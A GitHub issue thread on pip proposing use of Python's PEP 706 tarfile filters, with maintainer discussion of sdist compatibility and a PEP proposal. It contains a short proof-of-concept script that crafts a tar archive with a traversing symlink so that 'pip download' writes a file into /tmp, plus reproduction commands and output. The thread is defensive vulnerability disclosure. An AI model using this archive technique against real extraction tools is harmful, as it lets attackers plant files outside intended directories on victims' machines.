Use tarfile filters (PEP 706) when unpacking? · Issue #12111 · pypa/pip (original) (raw)

@encukou

Description

Hello,
This is a continuation of #11464, which unfortunately turned sour.

New security releases of Python add a filter argument to tarfile.extract, which allows filtering common security issues.
Python 3.12 will raise a DeprecationWarning if filter is not specified. I assume pip will want to avoid the warning.
Python 3.14 will change the default to tarfile.data_filter.

What are your thoughts on how to best handle this? Happy to send a PR after a discussion.

Complicating factors:

Possible solutions I see:


In the previous issue, @pradyunsg said:

Our security model is that sdists involve arbitrary code execution, so they can do basically anything in the build process.

My point was that I think we should (and do) protect against certain classes of issues though, such as dumping files in arbitrary locations.

The latter is currently not true: pip's unpacking is vulnerable to symlink attacks. The attached reproducer makes pip download evil.tar.gz dump a file in /tmp/poc, without running arbitrary code.

As said before, given pip's security model this isn't a security issue -- AFAIK it could only become one if the function is copied/used as documented elsewhere.

Expected behavior

No response

pip version

main

Python version

3.12

OS

*nix, any

How to Reproduce

mkevil.py:

import tarfile

def mkinfo(name, **kwargs): tarinfo = tarfile.TarInfo(name=name) for name, value in kwargs.items(): setattr(tarinfo, name, value) return tarinfo

with tarfile.open('evil.tar.gz', 'w:gz') as tf: tf.addfile(mkinfo('./pyproject.toml')) tf.addfile(mkinfo('./tmp', type=tarfile.SYMTYPE, linkname='../../../../../../../../tmp')) tf.addfile(mkinfo('./tmp/poc'))

python mkevil.py
python -m pip download evil.tar.gz
ls ls /tmp/poc

Output

$ python mkevil.py

$ python -m pip download evil.tar.gz Looking in indexes: http://127.0.0.1:3141/root/pypi/+simple Processing ./evil.tar.gz File was already downloaded /home/pviktori/dev/one-offs/pocs/tarfile-pip/evil.tar.gz Installing build dependencies ... done Getting requirements to build wheel ... done Preparing metadata (pyproject.toml) ... done Successfully downloaded UNKNOWN

$ ls /tmp/poc # created by pip download /tmp/poc

Code of Conduct

@pfmoore

+1 on ensuring that when unpacking tarfiles, pip never either creates files outside of the target directory, or creates links to files outside of the target directory. I don't believe there is any valid form of sdist that needs the capability to do this (and if there is, I'd support a PEP modifying the sdist spec to make it illegal 🙂)

I'd be slightly uncomfortable if we had to make such protection only available in some Python versions, but I could live with it.

I have no opinion regarding differences in mode handling. As a Windows user I don't think it affects me, and in general, I don't think we should be trying to preserve mode bits anyway. I suspect someone, somewhere, will have a sdist that expects a particular mode bit to be preserved from source tree, through sdist and wheel, to final install (unless some other part of the chain already breaks this!) Again, I'd be happy to support a PEP that made such expectations illegal, though 😉

This latter is my biggest concern. The sdist format is hugely under-specified, and people could easily be using it in ways we don't know about and wouldn't necessarily sanction. There's a risk that we could end up needing to write a PEP to tighten up the standards (pip's policy is that we implement standard-defined behaviour, so we wouldn't implement significant restrictions unilaterally).

@encukou

I'd be slightly uncomfortable if we had to make such protection only available in some Python versions, but I could live with it.

It's now in the latest security releases of all supported Python versions.

unless some other part of the chain already breaks this!

It does: Python's zipfile ignores mode on extraction. (So do non-Windows filesystems and git.)
So I guess the worry would be that the wheel-generating code of a Unix-only project writes file contents differently depending on file modes.


Guess I should mention another potential incompatibility: historically tarfile honors owner user/group if run as the superuser, pip and data_filter ignore it.

This was referenced

Jul 3, 2023

@encukou

The sdist format is hugely under-specified, and people could easily be using it in ways we don't know about and wouldn't necessarily sanction. There's a risk that we could end up needing to write a PEP to tighten up the standards (pip's policy is that we implement standard-defined behaviour, so we wouldn't implement significant restrictions unilaterally).

Here's the PEP proposal: https://discuss.python.org/t/using-tarfile-data-filter-for-source-distribution-extraction/28928

@github-actions github-actions bot locked as resolved and limited conversation to collaborators

Jun 6, 2024